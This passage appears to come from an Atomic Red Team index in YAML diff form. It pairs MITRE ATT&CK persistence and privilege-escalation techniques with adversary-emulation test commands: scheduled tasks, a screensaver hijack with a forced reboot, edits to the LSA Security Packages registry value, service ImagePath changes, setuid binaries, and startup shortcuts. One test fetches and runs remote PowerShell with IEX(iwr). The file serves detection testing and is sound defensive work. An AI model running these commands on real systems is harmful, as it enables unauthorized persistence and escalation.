#{target} /RU #{user_name} /RP #{password} + /TN "Atomic task" /F >nul 2>&1 + +' + - name: Powershell Cmdlet Scheduled Task + auto_generated_guid: af9fd58f-c4ac-4bf2-a9ba-224b71ff25fd + description: | + Create an atomic scheduled task that leverages native powershell cmdlets. + + Upon successful execution, powershell.exe will create a scheduled task to spawn cmd.exe at 20:10. + supported_platforms: + - windows + executor: + name: powershell + elevation_required: false + command: | + $Action = New-ScheduledTaskAction -Execute "calc.exe" + $Trigger = New-ScheduledTaskTrigger -AtLogon + $User = New-ScheduledTaskPrincipal -GroupId "BUILTIN\Administrators" -RunLevel Highest + $Set = New-ScheduledTaskSettingsSet + $object = New-ScheduledTask -Action $Action -Principal $User -Trigger $Trigger -Settings $Set + Register-ScheduledTask AtomicTask -InputObject $object + cleanup_command: 'Unregister-ScheduledTask -TaskName "AtomicTask" -confirm:$false + >$null 2>&1 + +' + - name: Task Scheduler via VBA + auto_generated_guid: ecd3fa21-7792-41a2-8726-2c5c673414d3 + description: | + This module utilizes the Windows API to schedule a task for code execution (notepad.exe). The task scheduler will execute "notepad.exe" within + 30 - 40 seconds after this module has run + supported_platforms: + - windows + input_arguments: + ms_product: + description: Maldoc application Word + type: String + default: Word + dependency_executor_name: powershell + dependencies: + - description: 'Microsoft #{ms_product} must be installed + +' + prereq_command: | + try { + New-Object -COMObject "#{ms_product}.Application" | Out-Null + $process = "#{ms_product}"; if ( $process -eq "Word") {$process = "winword"} + Stop-Process -Name $process + exit 0 + } catch { exit 1 } + get_prereq_command: 'Write-Host "You will need to install Microsoft #{ms_product} + manually to meet this requirement" + +' + executor: + command: "IEX (iwr \"https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1\" + -UseBasicParsing) \nInvoke-MalDoc -macroFile \"PathToAtomicsFolder\\T1053.005\\src\\T1053.005-macrocode.txt\" + -officeProduct \"#{ms_product}\" -sub \"Scheduler\"\n" + name: powershell + - name: WMI Invoke-CimMethod Scheduled Task + auto_generated_guid: e16b3b75-dc9e-4cde-a23d-dfa2d0507b3b + description: 'Create an scheduled task that executes notepad.exe after user + login from XML by leveraging WMI class PS_ScheduledTask. Does the same thing + as Register-ScheduledTask cmdlet behind the scenes. + +' + supported_platforms: + - windows + executor: + name: powershell + elevation_required: true + command: | + $xml = [System.IO.File]::ReadAllText("PathToAtomicsFolder\T1053.005\src\T1053_005_WMI.xml") + Invoke-CimMethod -ClassName PS_ScheduledTask -NameSpace "Root\Microsoft\Windows\TaskScheduler" -MethodName "RegisterByXml" -Arguments @{ Force = $true; Xml =$xml; } + cleanup_command: 'Unregister-ScheduledTask -TaskName "T1053_005_WMI" -confirm:$false + >$null 2>&1 + +' + T1053: + technique: + id: attack-pattern--35dd844a-b219-4e2b-a6bb-efa9a75995a9 + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + name: Scheduled Task/Job + description: |- + Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically requires being a member of an admin or otherwise privileged group on the remote system.(Citation: TechNet Task Scheduler Security) + + Adversaries may use task scheduling to execute programs at system startup or on a scheduled basis for persistence. These mechanisms can also be abused to run a process under the context of a specified account (such as one with elevated permissions/privileges). + external_references: + - source_name: mitre-attack + external_id: T1053 + url: https://attack.mitre.org/techniques/T1053 + - external_id: CAPEC-557 + source_name: capec + url: https://capec.mitre.org/data/definitions/557.html + - url: https://technet.microsoft.com/en-us/library/cc785125.aspx + description: Microsoft. (2005, January 21). Task Scheduler and security. Retrieved + June 8, 2016. + source_name: TechNet Task Scheduler Security + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: execution + - kill_chain_name: mitre-attack + phase_name: persistence + - kill_chain_name: mitre-attack + phase_name: privilege-escalation + modified: '2021-04-20T16:31:11.405Z' + created: '2017-05-31T21:30:46.977Z' + x_mitre_platforms: + - Windows + - Linux + - macOS + - Containers + x_mitre_remote_support: true + x_mitre_effective_permissions: + - SYSTEM + - Administrator + - User + x_mitre_permissions_required: + - Administrator + - SYSTEM + - User + x_mitre_detection: "Monitor scheduled task creation from common utilities using + command-line invocation. Legitimate scheduled tasks may be created during + installation of new software or through system administration functions. Look + for changes to tasks that do not correlate with known software, patch cycles, + etc. \n\nSuspicious program execution through scheduled tasks may show up + as outlier processes that have not been seen before when compared against + historical data. Data and events should not be viewed in isolation, but as + part of a chain of behavior that could lead to other activities, such as network + connections made for Command and Control, learning details about the environment + through Discovery, and Lateral Movement." + x_mitre_data_sources: + - 'File: File Creation' + - 'Container: Container Creation' + - 'Scheduled Job: Scheduled Job Creation' + - 'Command: Command Execution' + - 'File: File Modification' + - 'Process: Process Creation' + x_mitre_contributors: + - Prashant Verma, Paladion + - Leo Loobeek, @leoloobeek + - Travis Smith, Tripwire + - Alain Homewood, Insomnia Security + x_mitre_version: '2.1' + x_mitre_is_subtechnique: false + atomic_tests: [] + T1546.002: + technique: + external_references: + - source_name: mitre-attack + external_id: T1546.002 + url: https://attack.mitre.org/techniques/T1546/002 + - source_name: Wikipedia Screensaver + description: Wikipedia. (2017, November 22). Screensaver. Retrieved December + 5, 2017. + url: https://en.wikipedia.org/wiki/Screensaver + - source_name: ESET Gazer Aug 2017 + description: 'ESET. (2017, August). Gazing at Gazer: Turla’s new second stage + backdoor. Retrieved September 14, 2017.' + url: https://www.welivesecurity.com/wp-content/uploads/2017/08/eset-gazer.pdf + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + name: Screensaver + description: |- + Adversaries may establish persistence by executing malicious content triggered by user inactivity. Screensavers are programs that execute after a configurable time of user inactivity and consist of Portable Executable (PE) files with a .scr file extension.(Citation: Wikipedia Screensaver) The Windows screensaver application scrnsave.scr is located in C:\Windows\System32\, and C:\Windows\sysWOW64\ on 64-bit Windows systems, along with screensavers included with base Windows installations. + + The following screensaver settings are stored in the Registry (HKCU\Control Panel\Desktop\) and could be manipulated to achieve persistence: + + * SCRNSAVE.exe - set to malicious PE path + * ScreenSaveActive - set to '1' to enable the screensaver + * ScreenSaverIsSecure - set to '0' to not require a password to unlock + * ScreenSaveTimeout - sets user inactivity timeout before screensaver is executed + + Adversaries can use screensaver settings to maintain persistence by setting the screensaver to run malware after a certain timeframe of user inactivity. (Citation: ESET Gazer Aug 2017) + id: attack-pattern--ce4b7013-640e-48a9-b501-d0025a95f4bf + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: privilege-escalation + - kill_chain_name: mitre-attack + phase_name: persistence + modified: '2020-03-23T12:23:04.955Z' + created: '2020-01-24T13:51:01.210Z' + x_mitre_version: '1.0' + x_mitre_is_subtechnique: true + x_mitre_permissions_required: + - User + x_mitre_detection: |- + Monitor process execution and command-line parameters of .scr files. Monitor changes to screensaver configuration changes in the Registry that may not correlate with typical user behavior. + + Tools such as Sysinternals Autoruns can be used to detect changes to the screensaver binary path in the Registry. Suspicious paths and PE files may indicate outliers among legitimate screensavers in a network and should be investigated. + x_mitre_data_sources: + - 'Process: Process Creation' + - 'Windows Registry: Windows Registry Key Modification' + - 'Command: Command Execution' + - 'File: File Creation' + - 'File: File Modification' + x_mitre_contributors: + - Bartosz Jerzman + x_mitre_platforms: + - Windows + identifier: T1546.002 + atomic_tests: + - name: Set Arbitrary Binary as Screensaver + auto_generated_guid: 281201e7-de41-4dc9-b73d-f288938cbb64 + description: 'This test copies a binary into the Windows System32 folder and + sets it as the screensaver so it will execute for persistence. Requires a + reboot and logon. + +' + supported_platforms: + - windows + input_arguments: + input_binary: + description: Executable binary to use in place of screensaver for persistence + type: path + default: C:\Windows\System32\cmd.exe + executor: + command: | + copy #{input_binary} "%SystemRoot%\System32\evilscreensaver.scr" + reg.exe add "HKEY_CURRENT_USER\Control Panel\Desktop" /v ScreenSaveActive /t REG_SZ /d 1 /f + reg.exe add "HKEY_CURRENT_USER\Control Panel\Desktop" /v ScreenSaveTimeout /t REG_SZ /d 60 /f + reg.exe add "HKEY_CURRENT_USER\Control Panel\Desktop" /v ScreenSaverIsSecure /t REG_SZ /d 0 /f + reg.exe add "HKEY_CURRENT_USER\Control Panel\Desktop" /v SCRNSAVE.EXE /t REG_SZ /d "%SystemRoot%\System32\evilscreensaver.scr" /f + shutdown /r /t 0 + name: command_prompt + elevation_required: true + T1547.005: + technique: + external_references: + - source_name: mitre-attack + external_id: T1547.005 + url: https://attack.mitre.org/techniques/T1547/005 + - url: http://docplayer.net/20839173-Analysis-of-malicious-security-support-provider-dlls.html + description: Graeber, M. (2014, October). Analysis of Malicious Security Support + Provider DLLs. Retrieved March 1, 2017. + source_name: Graeber 2014 + - url: https://technet.microsoft.com/en-us/library/dn408187.aspx + description: Microsoft. (2013, July 31). Configuring Additional LSA Protection. + Retrieved June 24, 2015. + source_name: Microsoft Configure LSA + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + name: Security Support Provider + description: |- + Adversaries may abuse security support providers (SSPs) to execute DLLs when the system boots. Windows SSP DLLs are loaded into the Local Security Authority (LSA) process at system start. Once loaded into the LSA, SSP DLLs have access to encrypted and plaintext passwords that are stored in Windows, such as any logged-on user's Domain password or smart card PINs. + + The SSP configuration is stored in two Registry keys: HKLM\SYSTEM\CurrentControlSet\Control\Lsa\Security Packages and HKLM\SYSTEM\CurrentControlSet\Control\Lsa\OSConfig\Security Packages. An adversary may modify these Registry keys to add new SSPs, which will be loaded the next time the system boots, or when the AddSecurityPackage Windows API function is called.(Citation: Graeber 2014) + id: attack-pattern--5095a853-299c-4876-abd7-ac0050fb5462 + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: persistence + - kill_chain_name: mitre-attack + phase_name: privilege-escalation + modified: '2020-03-25T15:42:48.910Z' + created: '2020-01-24T17:16:11.806Z' + x_mitre_version: '1.0' + x_mitre_is_subtechnique: true + x_mitre_permissions_required: + - Administrator + x_mitre_detection: 'Monitor the Registry for changes to the SSP Registry keys. + Monitor the LSA process for DLL loads. Windows 8.1 and Windows Server 2012 + R2 may generate events when unsigned SSP DLLs try to load into the LSA by + setting the Registry key HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image + File Execution Options\LSASS.exe with AuditLevel = 8. (Citation: Graeber + 2014) (Citation: Microsoft Configure LSA)' + x_mitre_data_sources: + - 'Windows Registry: Windows Registry Key Modification' + - 'Module: Module Load' + - 'Command: Command Execution' + x_mitre_platforms: + - Windows + identifier: T1547.005 + atomic_tests: + - name: Modify SSP configuration in registry + auto_generated_guid: afdfd7e3-8a0b-409f-85f7-886fdf249c9e + description: Add a value to a Windows registry SSP key, simulating an adversarial + modification of those keys. + supported_platforms: + - windows + input_arguments: + fake_ssp_dll: + description: Value added to registry key. Normally refers to a DLL name + in C:\Windows\System32. + type: String + default: not-a-ssp + executor: + command: | + # run these in sequence + $SecurityPackages = Get-ItemProperty HKLM:\System\CurrentControlSet\Control\Lsa -Name 'Security Packages' | Select-Object -ExpandProperty 'Security Packages' + $SecurityPackagesUpdated = $SecurityPackages + $SecurityPackagesUpdated += "#{fake_ssp_dll}" + Set-ItemProperty HKLM:\SYSTEM\CurrentControlSet\Control\Lsa -Name 'Security Packages' -Value $SecurityPackagesUpdated + + # revert (before reboot) + Set-ItemProperty HKLM:\SYSTEM\CurrentControlSet\Control\Lsa -Name 'Security Packages' -Value $SecurityPackages + name: powershell + elevation_required: true + T1574.010: + technique: + created: '2020-03-12T20:43:53.998Z' + modified: '2020-09-16T19:10:04.262Z' + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: persistence + - kill_chain_name: mitre-attack + phase_name: privilege-escalation + - kill_chain_name: mitre-attack + phase_name: defense-evasion + type: attack-pattern + id: attack-pattern--9e8b28c9-35fe-48ac-a14d-e6cc032dcbcd + description: |- + Adversaries may execute their own malicious payloads by hijacking the binaries used by services. Adversaries may use flaws in the permissions of Windows services to replace the binary that is executed upon service start. These service processes may automatically execute specific binaries as part of their functionality or to perform other actions. If the permissions on the file system directory containing a target binary, or permissions on the binary itself are improperly set, then the target binary may be overwritten with another binary using user-level permissions and executed by the original process. If the original process and thread are running under a higher permissions level, then the replaced binary will also execute under higher-level permissions, which could include SYSTEM. + + Adversaries may use this technique to replace legitimate binaries with malicious ones as a means of executing code at a higher permissions level. If the executing process is set to run at a specific time or during a certain event (e.g., system bootup) then this technique can also be used for persistence. + name: Services File Permissions Weakness + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + external_references: + - source_name: mitre-attack + external_id: T1574.010 + url: https://attack.mitre.org/techniques/T1574/010 + - external_id: CAPEC-17 + source_name: capec + url: https://capec.mitre.org/data/definitions/17.html + x_mitre_platforms: + - Windows + x_mitre_detection: "Look for changes to binaries and service executables that + may normally occur during software updates. If an executable is written, renamed, + and/or moved to match an existing service executable, it could be detected + and correlated with other suspicious behavior. Hashing of binaries and service + executables could be used to detect replacement against historical data.\n\nLook + for abnormal process call trees from typical processes and services and for + execution of other commands that could relate to Discovery or other adversary + techniques. " + x_mitre_permissions_required: + - Administrator + - User + x_mitre_effective_permissions: + - SYSTEM + - Administrator + - User + x_mitre_is_subtechnique: true + x_mitre_version: '1.0' + x_mitre_data_sources: + - 'File: File Creation' + - 'File: File Modification' + - 'Process: Process Creation' + - 'Service: Service Metadata' + x_mitre_contributors: + - Travis Smith, Tripwire + - Stefan Kanthak + atomic_tests: [] + T1574.011: + technique: + created: '2020-03-13T11:42:14.444Z' + modified: '2020-09-16T19:07:48.590Z' + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: persistence + - kill_chain_name: mitre-attack + phase_name: privilege-escalation + - kill_chain_name: mitre-attack + phase_name: defense-evasion + type: attack-pattern + id: attack-pattern--17cc750b-e95b-4d7d-9dde-49e0de24148c + description: "Adversaries may execute their own malicious payloads by hijacking + the Registry entries used by services. Adversaries may use flaws in the permissions + for registry to redirect from the originally specified executable to one that + they control, in order to launch their own code at Service start. Windows + stores local service configuration information in the Registry under HKLM\\SYSTEM\\CurrentControlSet\\Services. + The information stored under a service's Registry keys can be manipulated + to modify a service's execution parameters through tools such as the service + controller, sc.exe, [PowerShell](https://attack.mitre.org/techniques/T1059/001), + or [Reg](https://attack.mitre.org/software/S0075). Access to Registry keys + is controlled through Access Control Lists and permissions. (Citation: Registry + Key Security)\n\nIf the permissions for users and groups are not properly + set and allow access to the Registry keys for a service, then adversaries + can change the service binPath/ImagePath to point to a different executable + under their control. When the service starts or is restarted, then the adversary-controlled + program will execute, allowing the adversary to gain persistence and/or privilege + escalation to the account context the service is set to execute under (local/domain + account, SYSTEM, LocalService, or NetworkService).\n\nAdversaries may also + alter Registry keys associated with service failure parameters (such as FailureCommand) + that may be executed in an elevated context anytime the service fails or is + intentionally corrupted.(Citation: Kansa Service related collectors)(Citation: + Tweet Registry Perms Weakness) " + name: Services Registry Permissions Weakness + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + external_references: + - source_name: mitre-attack + external_id: T1574.011 + url: https://attack.mitre.org/techniques/T1574/011 + - external_id: CAPEC-478 + source_name: capec + url: https://capec.mitre.org/data/definitions/478.html + - source_name: Registry Key Security + url: https://docs.microsoft.com/en-us/windows/win32/sysinfo/registry-key-security-and-access-rights?redirectedfrom=MSDN + description: Microsoft. (2018, May 31). Registry Key Security and Access Rights. + Retrieved March 16, 2017. + - source_name: Kansa Service related collectors + url: https://trustedsignal.blogspot.com/2014/05/kansa-service-related-collectors-and.html + description: 'Hull, D.. (2014, May 3). Kansa: Service related collectors and + analysis. Retrieved October 10, 2019.' + - source_name: Tweet Registry Perms Weakness + url: https://twitter.com/r0wdy_/status/936365549553991680 + description: "@r0wdy_. (2017, November 30). Service Recovery Parameters. Retrieved + April 9, 2018." + - source_name: Autoruns for Windows + url: https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns + description: Mark Russinovich. (2019, June 28). Autoruns for Windows v13.96. + Retrieved March 13, 2020. + x_mitre_platforms: + - Windows + x_mitre_contributors: + - Travis Smith, Tripwire + - Matthew Demaske, Adaptforward + x_mitre_data_sources: + - 'Windows Registry: Windows Registry Key Modification' + - 'Process: Process Creation' + - 'Service: Service Metadata' + - 'Command: Command Execution' + x_mitre_detection: |- + Service changes are reflected in the Registry. Modification to existing services should not occur frequently. If a service binary path or failure parameters are changed to values that are not typical for that service and does not correlate with software updates, then it may be due to malicious activity. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as network connections made for Command and Control, learning details about the environment through Discovery, and Lateral Movement. + + Tools such as Sysinternals Autoruns may also be used to detect system changes that could be attempts at persistence, including listing current service information. (Citation: Autoruns for Windows) Look for changes to services that do not correlate with known software, patch cycles, etc. Suspicious program execution through services may show up as outlier processes that have not been seen before when compared against historical data. + + Monitor processes and command-line arguments for actions that could be done to modify services. Remote access tools with built-in features may interact directly with the Windows API to perform these functions outside of typical system utilities. Services may also be changed through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001), so additional logging may need to be configured to gather the appropriate data. + x_mitre_permissions_required: + - Administrator + - User + x_mitre_effective_permissions: + - SYSTEM + x_mitre_is_subtechnique: true + x_mitre_version: '1.0' + x_mitre_defense_bypassed: + - Application control + identifier: T1574.011 + atomic_tests: + - name: Service Registry Permissions Weakness + auto_generated_guid: f7536d63-7fd4-466f-89da-7e48d550752a + description: | + Service registry permissions weakness check and then which can lead to privilege escalation with ImagePath. eg. + reg add "HKLM\SYSTEM\CurrentControlSet\Services\#{weak_service_name}" /v ImagePath /d "C:\temp\AtomicRedteam.exe" + supported_platforms: + - windows + input_arguments: + weak_service_name: + description: weak service check + type: String + default: weakservicename + executor: + command: | + get-acl REGISTRY::HKLM\SYSTEM\CurrentControlSet\Services\* |FL + get-acl REGISTRY::HKLM\SYSTEM\CurrentControlSet\Services\#{weak_service_name} |FL + name: powershell + - name: Service ImagePath Change with reg.exe + auto_generated_guid: f38e9eea-e1d7-4ba6-b716-584791963827 + description: 'Change Service registry ImagePath of a bengin service to a malicious + file + +' + supported_platforms: + - windows + input_arguments: + weak_service_name: + description: weak service name + type: String + default: calcservice + weak_service_path: + description: weak service path + type: String + default: "%windir%\\system32\\win32calc.exe" + malicious_service_path: + description: malicious service path + type: String + default: "%windir%\\system32\\cmd.exe" + dependency_executor_name: powershell + dependencies: + - description: 'The service must exist (#{weak_service_name}) + +' + prereq_command: 'if (Get-Service #{weak_service_name}) {exit 0} else {exit + 1} + +' + get_prereq_command: 'sc.exe create #{weak_service_name} binpath= "#{weak_service_path}" + +' + executor: + command: 'reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\#{weak_service_name}" + /f /v ImagePath /d "#{malicious_service_path}" + +' + cleanup_command: 'sc.exe delete #{weak_service_name} + +' + name: command_prompt + T1548.001: + technique: + external_references: + - source_name: mitre-attack + external_id: T1548.001 + url: https://attack.mitre.org/techniques/T1548/001 + - url: http://man7.org/linux/man-pages/man2/setuid.2.html + description: Michael Kerrisk. (2017, September 15). Linux Programmer's Manual. + Retrieved September 21, 2018. + source_name: setuid man page + - url: https://www.welivesecurity.com/2016/07/06/new-osxkeydnap-malware-hungry-credentials/ + description: Marc-Etienne M.Leveille. (2016, July 6). New OSX/Keydnap malware + is hungry for credentials. Retrieved July 3, 2017. + source_name: OSX Keydnap malware + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + name: Setuid and Setgid + description: |- + An adversary may perform shell escapes or exploit vulnerabilities in an application with the setsuid or setgid bits to get code running in a different user’s context. On Linux or macOS, when the setuid or setgid bits are set for an application, the application will run with the privileges of the owning user or group respectively. (Citation: setuid man page). Normally an application is run in the current user’s context, regardless of which user or group owns the application. However, there are instances where programs need to be executed in an elevated context to function properly, but the user running them doesn’t need the elevated privileges. + + Instead of creating an entry in the sudoers file, which must be done by root, any user can specify the setuid or setgid flag to be set for their own applications. These bits are indicated with an "s" instead of an "x" when viewing a file's attributes via ls -l. The chmod program can set these bits with via bitmasking, chmod 4777 [file] or via shorthand naming, chmod u+s [file]. + + Adversaries can use this mechanism on their own malware to make sure they're able to execute in elevated contexts in the future.(Citation: OSX Keydnap malware). + id: attack-pattern--6831414d-bb70-42b7-8030-d4e06b2660c9 + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: privilege-escalation + - kill_chain_name: mitre-attack + phase_name: defense-evasion + modified: '2020-03-27T00:43:58.149Z' + created: '2020-01-30T14:11:41.212Z' + x_mitre_version: '1.0' + x_mitre_is_subtechnique: true + x_mitre_permissions_required: + - User + x_mitre_detection: Monitor the file system for files that have the setuid or + setgid bits set. Monitor for execution of utilities, like chmod, and their + command-line arguments to look for setuid or setguid bits being set. + x_mitre_data_sources: + - 'Command: Command Execution' + - 'File: File Metadata' + - 'File: File Modification' + x_mitre_platforms: + - Linux + - macOS + identifier: T1548.001 + atomic_tests: + - name: Make and modify binary from C source + auto_generated_guid: 896dfe97-ae43-4101-8e96-9a7996555d80 + description: 'Make, change owner, and change file attributes on a C source code + file + +' + supported_platforms: + - macos + - linux + input_arguments: + payload: + description: hello.c payload + type: path + default: PathToAtomicsFolder/T1548.001/src/hello.c + executor: + command: | + cp #{payload} /tmp/hello.c + sudo chown root /tmp/hello.c + sudo make /tmp/hello + sudo chown root /tmp/hello + sudo chmod u+s /tmp/hello + /tmp/hello + cleanup_command: | + sudo rm /tmp/hello + sudo rm /tmp/hello.c + name: sh + elevation_required: true + - name: Set a SetUID flag on file + auto_generated_guid: 759055b3-3885-4582-a8ec-c00c9d64dd79 + description: 'This test sets the SetUID flag on a file in Linux and macOS. + +' + supported_platforms: + - macos + - linux + input_arguments: + file_to_setuid: + description: Path of file to set SetUID flag + type: path + default: "/tmp/evilBinary" + executor: + command: | + sudo touch #{file_to_setuid} + sudo chown root #{file_to_setuid} + sudo chmod u+s #{file_to_setuid} + cleanup_command: 'sudo rm #{file_to_setuid} + +' + name: sh + elevation_required: true + - name: Set a SetGID flag on file + auto_generated_guid: db55f666-7cba-46c6-9fe6-205a05c3242c + description: 'This test sets the SetGID flag on a file in Linux and macOS. + +' + supported_platforms: + - macos + - linux + input_arguments: + file_to_setuid: + description: Path of file to set SetGID flag + type: path + default: "/tmp/evilBinary" + executor: + command: | + sudo touch #{file_to_setuid} + sudo chown root #{file_to_setuid} + sudo chmod g+s #{file_to_setuid} + cleanup_command: 'sudo rm #{file_to_setuid} + +' + name: sh + elevation_required: true + T1547.009: + technique: + id: attack-pattern--4ab929c6-ee2d-4fb5-aab4-b14be2ed7179 + description: |- + Adversaries may create or edit shortcuts to run a program during system boot or user login. Shortcuts or symbolic links are ways of referencing other files or programs that will be opened or executed when the shortcut is clicked or executed by a system startup process. + + Adversaries could use shortcuts to execute their tools for persistence. They may create a new shortcut as a means of indirection that may use [Masquerading](https://attack.mitre.org/techniques/T1036) to look like a legitimate program. Adversaries could also edit the target path or entirely replace an existing shortcut so their tools will be executed instead of the intended legitimate program. + name: Shortcut Modification + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + external_references: + - source_name: mitre-attack + external_id: T1547.009 + url: https://attack.mitre.org/techniques/T1547/009 + - external_id: CAPEC-132 + source_name: capec + url: https://capec.mitre.org/data/definitions/132.html + - source_name: BSidesSLC 2020 - LNK Elastic + url: https://www.youtube.com/watch?v=nJ0UsyiUEqQ + description: French, D., Filar, B.. (2020, March 21). A Chain Is No Stronger + Than Its Weakest LNK. Retrieved November 30, 2020. + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: persistence + - kill_chain_name: mitre-attack + phase_name: privilege-escalation + modified: '2021-04-13T21:30:24.555Z' + created: '2020-01-24T19:00:32.917Z' + x_mitre_platforms: + - Windows + x_mitre_contributors: + - David French, Elastic + - Bobby, Filar, Elastic + - Travis Smith, Tripwire + x_mitre_data_sources: + - 'File: File Creation' + - 'File: File Modification' + - 'Process: Process Creation' + x_mitre_detection: |- + Since a shortcut's target path likely will not change, modifications to shortcut files that do not correlate with known software changes, patches, removal, etc., may be suspicious. Analysis should attempt to relate shortcut file change or creation events to other potentially suspicious events based on known adversary behavior such as process launches of unknown executables that make network connections. + + Monitor for LNK files created with a Zone Identifier value greater than 1, which may indicate that the LNK file originated from outside of the network.(Citation: BSidesSLC 2020 - LNK Elastic) + x_mitre_permissions_required: + - Administrator + - User + x_mitre_is_subtechnique: true + x_mitre_version: '1.1' + identifier: T1547.009 + atomic_tests: + - name: Shortcut Modification + auto_generated_guid: ce4fc678-364f-4282-af16-2fb4c78005ce + description: | + This test to simulate shortcut modification and then execute. example shortcut (*.lnk , .url) strings check with powershell; + gci -path "C:\Users" -recurse -include *.url -ea SilentlyContinue | Select-String -Pattern "exe" | FL. + Upon execution, calc.exe will be launched. + supported_platforms: + - windows + input_arguments: + shortcut_file_path: + description: shortcut modified and execute + type: path + default: "%temp%\\T1547.009_modified_shortcut.url" + executor: + command: | + echo [InternetShortcut] > #{shortcut_file_path} + echo URL=C:\windows\system32\calc.exe >> #{shortcut_file_path} + #{shortcut_file_path} + cleanup_command: 'del -f #{shortcut_file_path} >nul 2>&1 + +' + name: command_prompt + - name: Create shortcut to cmd in startup folders + auto_generated_guid: cfdc954d-4bb0-4027-875b-a1893ce406f2 + description: | + LNK file to launch CMD placed in startup folder. Upon execution, open File Explorer and browse to "%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\" + to view the new shortcut. + supported_platforms: + - windows + executor: + command: | + $Shell = New-Object -ComObject ("WScript.Shell") + $ShortCut = $Shell.CreateShortcut("$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\T1547.009.lnk") + $ShortCut.TargetPath="cmd.exe" + $ShortCut.WorkingDirectory = "C:\Windows\System32"; + $ShortCut.WindowStyle = 1; + $ShortCut.Description = "T1547.009."; + $ShortCut.Save() + + $Shell = New-Object -ComObject ("WScript.Shell") + $ShortCut = $Shell.CreateShortcut("$env:ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\T1547.009.lnk") + $ShortCut.TargetPath="cmd.exe" + $ShortCut.WorkingDirectory = "C:\Windows\System32"; + $ShortCut.WindowStyle = 1; + $ShortCut.Description = "T1547.009."; + $ShortCut.Save() + cleanup_command: | + Remove-Item "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\T1547.009.lnk" -ErrorAction Ignore + Remove-Item "$env:ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\T1547.009.lnk" -ErrorAction Ignore + name: powershell + elevation_required: true + T1037.005: + technique: + id: attack-pattern--c0dfe7b0-b873-4618-9ff8-53e31f70907f + description: "Adversaries may use startup items automatically executed at boot + initialization to establish persistence. Startup items execute during the + final phase of the boot process and contain shell scripts or other executable + files along with configuration information used by the system to determine + the execution order for all startup items. (Citation: Startup Items)\n\nThis + is technically a deprecated technology (superseded by [Launch Daemon](https://attack.mitre.org/techniques/T1543/004)), + and thus the appropriate folder, /Library/StartupItems isn’t + guaranteed to exist on the system by default, but does appear to exist by + default on macOS Sierra. A startup item is a directory whose executable and + configuration property list (plist), StartupParameters.plist, + reside in the top-level directory. \n\nAn adversary can create the appropriate + folders/files in the StartupItems directory to register their own persistence + mechanism (Citation: Methods of Mac Malware Persistence). Additionally, since + StartupItems run during the bootup phase of macOS, they will run as the elevated + root user." + name: Startup Items + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + external_references: + - source_name: mitre-attack + external_id: T1037.005 + url: https://attack.mitre.org/techniques/T1037/005 + - url: https://developer.apple.com/library/content/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/StartupItems.html + description: Apple. (2016, September 13). Startup Items. Retrieved July 11, + 2017. + source_name: Startup Items + - url: https://www.virusbulletin.com/uploads/pdf/conference/vb2014/VB2014-Wardle.pdf + description: Patrick Wardle. (2014, September). Methods of Malware Persistence + on Mac OS X. Retrieved July 5, 2017. + source_name: Methods of Mac Malware Persistence + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: persistence + - kill_chain_name: mitre-attack + phase_name: privilege-escalation + modified: '2020-03-24T23:47:39.124Z' + created: '2020-01-15T18:00:33.603Z' + x_mitre_platforms: + - macOS + x_mitre_data_sources: + - 'File: File Creation' + - 'File: File Modification' + - 'Process: Process Creation' + - 'Command: Command Execution' + x_mitre_detection: |- + The /Library/StartupItems folder can be monitored for changes. Similarly, the programs that are actually executed from this mechanism should be checked against a whitelist. + + Monitor processes that are executed during the bootup process to check for unusual or unknown applications and behavior. + x_mitre_permissions_required: + - Administrator + x_mitre_is_subtechnique: true + x_mitre_version: '1.0' + identifier: T1037.005 + atomic_tests: + - name: Add file to Local Library StartupItems + auto_generated_guid: 134627c3-75db-410e-bff8-7a920075f198 + description: | + Modify or create an file in 